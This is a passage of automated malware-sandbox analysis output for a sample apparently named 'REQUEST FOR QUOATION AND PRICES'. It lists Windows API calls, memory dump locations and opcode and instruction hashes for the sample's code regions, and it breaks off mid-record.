                                                                                                                                • Opcode Fuzzy Hash: 7b53139e7b944c4f23e065120b6c7b3991b66d4c0476f1428a05e883832ee6b1
                                                                                                                                • Instruction Fuzzy Hash: 7721D4B5D0024CAFDB10CFAAD580ADEBBF5EB48320F14841AE954A7310D378A940CFA5
                                                                                                                                APIs
                                                                                                                                • LdrInitializeThunk.NTDLL(00000000), ref: 36DD604E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558107577.0000000036DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DD0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36dd0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 9790ddfcb2448883fa834f8d8e9749d9ef5feb97d21dc5d3a9bbe36bb893abb2
                                                                                                                                • Instruction ID: 8777d6c9920fb467ff57ddf24f163a7d482af637bfc9c5378c9261225bd94c92
                                                                                                                                • Opcode Fuzzy Hash: 9790ddfcb2448883fa834f8d8e9749d9ef5feb97d21dc5d3a9bbe36bb893abb2
                                                                                                                                • Instruction Fuzzy Hash: CE114A78E002198FEB04EBA9D884EADB7F5BF88344F208165E844A7241DB31AC41CBA0
                                                                                                                                APIs
                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 37E508D7
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558925034.0000000037E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37E50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_37e50000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                • Opcode ID: 24470523b2ff73afa484035c6c005394f3d1169866b585e06600e9d7ca4b383c
                                                                                                                                • Instruction ID: f1202b80110ebcd4c9b6bef9d1b3e2eb25d14f6b10a8fbe3538247c48a651c81
                                                                                                                                • Opcode Fuzzy Hash: 24470523b2ff73afa484035c6c005394f3d1169866b585e06600e9d7ca4b383c
                                                                                                                                • Instruction Fuzzy Hash: 8421E3B5D0034CAFDB10CFAAD980ADEBBF5EB48320F14841AE954A7310C374A940CFA5
                                                                                                                                APIs
                                                                                                                                • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,37E5D79F), ref: 37E5E59D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558925034.0000000037E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37E50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_37e50000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DispatchMessage
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2061451462-0
                                                                                                                                • Opcode ID: 0b5178732dfe8447241cf5560ce838c1e1ead7efbd381ff27ccbebca65bddf2b
                                                                                                                                • Instruction ID: 293ca421fb2be84a0314085c9ff3084e51b6d594f29b65e17c00824f4fe8a2f5
                                                                                                                                • Opcode Fuzzy Hash: 0b5178732dfe8447241cf5560ce838c1e1ead7efbd381ff27ccbebca65bddf2b
                                                                                                                                • Instruction Fuzzy Hash: 3E1122B5C002499FCB20CF9AD545BDEFBF8EB48320F10852AD818A7300D378A540CFA5
                                                                                                                                APIs
                                                                                                                                • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,37E5D79F), ref: 37E5E59D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558925034.0000000037E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37E50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_37e50000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DispatchMessage
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2061451462-0
                                                                                                                                • Opcode ID: d58c1bf3e74ab0e98600ae99e179b01416e30776687aabeb8e03c2a4b2c80027
                                                                                                                                • Instruction ID: a44e313ca5e8369b9970217bd800c30cd47ba8d62ab75c17ab8205c37c2a54f1
                                                                                                                                • Opcode Fuzzy Hash: d58c1bf3e74ab0e98600ae99e179b01416e30776687aabeb8e03c2a4b2c80027
                                                                                                                                • Instruction Fuzzy Hash: D111EDB5C047499FCB20DF9AD544BDEBBF4EB48320F14852AE918A7240D778A640CFA9
                                                                                                                                APIs
                                                                                                                                • OleInitialize.OLE32(00000000), ref: 37E5D2B5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558925034.0000000037E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37E50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_37e50000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Initialize
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2538663250-0
                                                                                                                                • Opcode ID: acefddfb80bdcc5d4c5c183ae355030c5c109062cb9f884d839a5ee2a9465fcb
                                                                                                                                • Instruction ID: 66f59f6b070c2615f8e79019de25b92b020cd077136d5908bd7c81d23a3150b4
                                                                                                                                • Opcode Fuzzy Hash: acefddfb80bdcc5d4c5c183ae355030c5c109062cb9f884d839a5ee2a9465fcb
                                                                                                                                • Instruction Fuzzy Hash: 881100B9D003489FDB20DF9AC585B9EBBF4EB48324F24841AE518A7300C779A940CFA5
                                                                                                                                APIs
                                                                                                                                • OleInitialize.OLE32(00000000), ref: 37E5D2B5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558925034.0000000037E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37E50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_37e50000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Initialize
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2538663250-0
                                                                                                                                • Opcode ID: 07bdec0f1d21bb5feeab77bfde4a0e28c4e67ef3d69e40c76494fcef0900679e
                                                                                                                                • Instruction ID: cd34ad4c6914ba30a67875754df7854483ff842e3db0775217d4c59e3fda5637
                                                                                                                                • Opcode Fuzzy Hash: 07bdec0f1d21bb5feeab77bfde4a0e28c4e67ef3d69e40c76494fcef0900679e
                                                                                                                                • Instruction Fuzzy Hash: D71112B5C003489FDB20DF9AC585BDEBBF8EB48320F248829D518A7300C779A944CFA5
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558925034.0000000037E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37E50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_37e50000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Timer
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2870079774-0
                                                                                                                                • Opcode ID: 9f13c4c90e33070442c9362a808124d578249fb5e5552c497e7b695572ec1223
                                                                                                                                • Instruction ID: 009d74c506f960b4494114f9e60379abe88ba8f4d97a15f9a44e0095b7c00d54
                                                                                                                                • Opcode Fuzzy Hash: 9f13c4c90e33070442c9362a808124d578249fb5e5552c497e7b695572ec1223
                                                                                                                                • Instruction Fuzzy Hash: 3011D6B58003499FDB10DF9AD985BDEFBF8EB48320F148419D558A7210C375A944CFA5
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558925034.0000000037E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37E50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_37e50000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Timer
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2870079774-0
                                                                                                                                • Opcode ID: 69d4f80357c780b6ad94fc7043d3df94e2459e3589e90df72acec28cf7175e88
                                                                                                                                • Instruction ID: 44b37dae11eff844828ec390da8d0434d6a055c5e029716919d7cf859f44604a
                                                                                                                                • Opcode Fuzzy Hash: 69d4f80357c780b6ad94fc7043d3df94e2459e3589e90df72acec28cf7175e88
                                                                                                                                • Instruction Fuzzy Hash: B111E5B58003499FDB10DF9AD985BDEFBF8EB48320F148419D558A7200C375A944CFA5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5c556bde8691dfbf488a67e135dea45c056d350ca90658aa4b80c29f50c7f95b
                                                                                                                                • Instruction ID: 7faa1380d1064c635551afd518fae334ebb48eed5cd3ae6ba8a97410fef8b739
                                                                                                                                • Opcode Fuzzy Hash: 5c556bde8691dfbf488a67e135dea45c056d350ca90658aa4b80c29f50c7f95b
                                                                                                                                • Instruction Fuzzy Hash: ACE1D374A00228DFDB25DF60D954BADBBB2FB89301F5085AAD80A77354CB356E82DF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: cc8f18091fa17cc77b71d8608b6845b0e56455a2077f3a85338d92e5553d892c
                                                                                                                                • Instruction ID: b55d2c763cd2d529b556ae2c03e70507c45439e302e21a5c894b3edb1faa5304
                                                                                                                                • Opcode Fuzzy Hash: cc8f18091fa17cc77b71d8608b6845b0e56455a2077f3a85338d92e5553d892c
                                                                                                                                • Instruction Fuzzy Hash: 1AE1E374A00218DFDB25DF60D954BADBBB2FB89301F5085AAD80A77354CB35AE82DF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 986925d5efcf9bc1e3fdf07e7f17bcd749fae8eff016d940c28a86ccb6bcd45c
                                                                                                                                • Instruction ID: 0825b13879f7a5199cbcdd2face5a67de9225b73aed0eeade33617eda2a7ab36
                                                                                                                                • Opcode Fuzzy Hash: 986925d5efcf9bc1e3fdf07e7f17bcd749fae8eff016d940c28a86ccb6bcd45c
                                                                                                                                • Instruction Fuzzy Hash: 2B917874B107068FDB14EF79C89092EBBF2BF882007108A29D44ADB755EB75ED42CB91
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e9083e9e051ef51561d2c4f3e4ae5170fedb13a5ce21467e4e9fba00d59cbc7a
                                                                                                                                • Instruction ID: ba67c7c3abd548529c681c84eb17bc1f26c402423d0926a64467cf61ac410b7d
                                                                                                                                • Opcode Fuzzy Hash: e9083e9e051ef51561d2c4f3e4ae5170fedb13a5ce21467e4e9fba00d59cbc7a
                                                                                                                                • Instruction Fuzzy Hash: 7C713574E10319DFDB19DFA5C858AADBFB2BF88300F158129E506AB354DBB59982CF40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 00d220406c4a2ef3b800c565d8f74cec18a65be59afe556144ec74ca1d86bd6c
                                                                                                                                • Instruction ID: 29ae99bb76957ed6fa78bb93b01de6e31f5d9b1cb5ec784dc1d9cdfd37e99139
                                                                                                                                • Opcode Fuzzy Hash: 00d220406c4a2ef3b800c565d8f74cec18a65be59afe556144ec74ca1d86bd6c
                                                                                                                                • Instruction Fuzzy Hash: C961D774E10258DFEB25DF60D854BADBB72FB88301F1084AA990A77354DB356D82EF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 829594260bca0294e81f3ec64bcaca103e22f054a9c835ef772fe8d62f9ca05b
                                                                                                                                • Instruction ID: a9778990cb6baaae27a368aef5e14d0b7388170edc69c82d17d311bb0e844104
                                                                                                                                • Opcode Fuzzy Hash: 829594260bca0294e81f3ec64bcaca103e22f054a9c835ef772fe8d62f9ca05b
                                                                                                                                • Instruction Fuzzy Hash: 1351EE74D00318DFDB24DFA5D854BADBBB2FF88301F608129D809AB294DB35AA46DF40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 485fb2648dd951f71da00948565b589f5e6293581dad58f23744a708d9e45199
                                                                                                                                • Instruction ID: a9b60550a82e56c8b24151899c9c8197f1a7bf546589de26d0ffeed032f702f6
                                                                                                                                • Opcode Fuzzy Hash: 485fb2648dd951f71da00948565b589f5e6293581dad58f23744a708d9e45199
                                                                                                                                • Instruction Fuzzy Hash: FD519274E00218DFDB54DFA9D894ADDBBB2FF88300F248169D819AB365DB316946CF40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: acc387bcdf30acb46b3032f76579c510b1439c45ceec0a405dad7d7bdd78add0
                                                                                                                                • Instruction ID: c179263952b5bf956988e34d8b050122bed81d8f17e305ff366bcc3e798b0ae2
                                                                                                                                • Opcode Fuzzy Hash: acc387bcdf30acb46b3032f76579c510b1439c45ceec0a405dad7d7bdd78add0
                                                                                                                                • Instruction Fuzzy Hash: 8B41CD70B207069FDB14EF35C88092EBBF2FF88240B018529D445CF745EB72EA468BA1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ef22bf69247f1f883515ff981c6a6d89b0465787b0f4411f881a08d82edec858
                                                                                                                                • Instruction ID: cdf7bf147a257e136d5970326120c2582a7931588f2ebeb84ff0d82c9ce3781d
                                                                                                                                • Opcode Fuzzy Hash: ef22bf69247f1f883515ff981c6a6d89b0465787b0f4411f881a08d82edec858
                                                                                                                                • Instruction Fuzzy Hash: 4741FE71C183888FDB22DFA9D8507CEBFF4EF46220F15449BD4849B262D7359948CBA6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a486d83b9c3e5f9b240aa10ff80f5e8bc016c923e69f15d5b5d1ce502fe41850
                                                                                                                                • Instruction ID: e6953f9dc58f3071e5ec3a0c81cd7ff3b52b297c0f4646ee3867e80b575bc82f
                                                                                                                                • Opcode Fuzzy Hash: a486d83b9c3e5f9b240aa10ff80f5e8bc016c923e69f15d5b5d1ce502fe41850
                                                                                                                                • Instruction Fuzzy Hash: 60310474E243658BE721DB66D04078EBBF1AF44310F56416DC841BF641CBB2AD49CBD5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f8930cc90710ddb15b3aedc3a41e17cd65cbba8543ae9d6e34f427b9cef4df49
                                                                                                                                • Instruction ID: 018b588c64639737c58ef19408d3dc3e6a1d90995c1b327719e174236656dd96
                                                                                                                                • Opcode Fuzzy Hash: f8930cc90710ddb15b3aedc3a41e17cd65cbba8543ae9d6e34f427b9cef4df49
                                                                                                                                • Instruction Fuzzy Hash: 13319474E11705CBE728CF66D550BAEBBF25F48740F19882DD446AB380DBB69805CBA1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1ebdd033e828408d1b43acbd3fd2db759e91a28e40dfa140e04adaf3dd960a83
                                                                                                                                • Instruction ID: 60d2299a06b2605d8f1eb78063e1637230ec180d47b46a5c9db0f73e4ffb7725
                                                                                                                                • Opcode Fuzzy Hash: 1ebdd033e828408d1b43acbd3fd2db759e91a28e40dfa140e04adaf3dd960a83
                                                                                                                                • Instruction Fuzzy Hash: 64317A38E103098BDB19DFBAC4546AE7BF2AF88310F158529D516AB354DFB59842CF90
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 25dfd18fa069d03f41da46a7d1236fc17cb0b2dfac981373e660e58ba515a911
                                                                                                                                • Instruction ID: 071381a35757a0469885ffc906975f349fae49d17cece886270b40f390af3fab
                                                                                                                                • Opcode Fuzzy Hash: 25dfd18fa069d03f41da46a7d1236fc17cb0b2dfac981373e660e58ba515a911
                                                                                                                                • Instruction Fuzzy Hash: 75210778E10704CBD728CB66D550AEEBBF25F88700F19852DC446EB380DBB5AC09CBA1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7c1439b7731831c100bdd23f67b823606b36c81074a2b112f13ddb41954bb46c
                                                                                                                                • Instruction ID: 69880f62f154f865bbc2cbf3bc4c69eb695ff6ed7a9d52941cbcc47fe6b1e854
                                                                                                                                • Opcode Fuzzy Hash: 7c1439b7731831c100bdd23f67b823606b36c81074a2b112f13ddb41954bb46c
                                                                                                                                • Instruction Fuzzy Hash: 67314774D11318DFDB04DFA5D4547EEBBB2AF89304F50842AD814BB284DB7A894ACF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2531325691.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_9d000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1b7449c7f6743ed9654d16e73072bc09eb238d4f7824dd0abc25d73f13511f74
                                                                                                                                • Instruction ID: f45481dc7ff389bee99979b6441024a72cedcf9e596f1f37c590e48a7b9c1f99
                                                                                                                                • Opcode Fuzzy Hash: 1b7449c7f6743ed9654d16e73072bc09eb238d4f7824dd0abc25d73f13511f74
                                                                                                                                • Instruction Fuzzy Hash: BB213A71584200DFDF14DF10D9C0B26BFA5FB94320F24C56AD9090F246C336E856EBA2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2531546178.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_ad000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1b78ab75c58b071abac720f144fd3a988bf96260c912e5f09de97d6bfd151f21
                                                                                                                                • Instruction ID: c6192e3b5f85b68d4a38ee8b00ef8200392bbfbf279780531d42c06c0e2f1e5a
                                                                                                                                • Opcode Fuzzy Hash: 1b78ab75c58b071abac720f144fd3a988bf96260c912e5f09de97d6bfd151f21
                                                                                                                                • Instruction Fuzzy Hash: 8E212271604200EFDB24DF94D9C0F26BBA1EB85314F24C56ED84A0FA42C336D847CA62
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 352d65dd6accc8c254eda417a180bb775a43e208feb557a8057a906d7fe19023
                                                                                                                                • Instruction ID: 6ff8f5c130bc7be7a9e515a8109b0655c66dda573b245d43fc82c3356629dd5d
                                                                                                                                • Opcode Fuzzy Hash: 352d65dd6accc8c254eda417a180bb775a43e208feb557a8057a906d7fe19023
                                                                                                                                • Instruction Fuzzy Hash: 360149599783D48BF3162AB8DC9038A3FA46F92A69B539983C060CF905D902581E537F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4c9252dfb5f6d8bd5d5f0aba367e3d69039a8b535a36e3b8e2545c9d7509667b
                                                                                                                                • Instruction ID: fa01e73fd1f7afeb9cf04f832a7bc2d22e95159d98687c87433994880185f4f5
                                                                                                                                • Opcode Fuzzy Hash: 4c9252dfb5f6d8bd5d5f0aba367e3d69039a8b535a36e3b8e2545c9d7509667b
                                                                                                                                • Instruction Fuzzy Hash: 8B2115B8D10219DFCB00DFA4D444BEEBBB1FB49301F50946AD815B7290DB385A86CF90
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2531325691.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_9d000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 193d0a6e4c6a41fa8d380d8a3aebfad6d5fdfd2e37f37faa7afe8a0cd07d9e29
                                                                                                                                • Instruction ID: 75c30dec444e905b2dacf2aeb21225cd19b82776d93782fce5b3b3ca2f2a72f9
                                                                                                                                • Opcode Fuzzy Hash: 193d0a6e4c6a41fa8d380d8a3aebfad6d5fdfd2e37f37faa7afe8a0cd07d9e29
                                                                                                                                • Instruction Fuzzy Hash: DC110376544240CFCF05CF10D5C4B16BFB1FB94320F24C5AAD8480B616C336E856DBA2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 27e9fb753234ab2217d7a1b890da555287adb41c29de949e952b443c6a318085
                                                                                                                                • Instruction ID: 3a2fdb681e3739a2663eb9f2f7b2e4b0ee992591b42fb22a7edb60bb8ad5b7bd
                                                                                                                                • Opcode Fuzzy Hash: 27e9fb753234ab2217d7a1b890da555287adb41c29de949e952b443c6a318085
                                                                                                                                • Instruction Fuzzy Hash: 6621F2B8D10209DFDB00DFA5D444BEEBBB1FB88301F50946AD811B7254DB785A86CF90
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2531546178.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_ad000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7f3e037e22fa59686557c36097c7f2c442b72f34ba89836c3c3f47136ec8bdf6
                                                                                                                                • Instruction ID: e55928b3f63c07f136b2e370c25e33d22a16d8fcfd49e1b03e0c3bd6dac7d8e0
                                                                                                                                • Opcode Fuzzy Hash: 7f3e037e22fa59686557c36097c7f2c442b72f34ba89836c3c3f47136ec8bdf6
                                                                                                                                • Instruction Fuzzy Hash: 0111BB75504280DFCB15CF54D5C0B15BBA2FB85324F28C6AAD84A4BA56C33AD84ACB62
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8cff5e2566d0e4a1d2a36279443effaf42ecb59afe2effea99325aac2af07e09
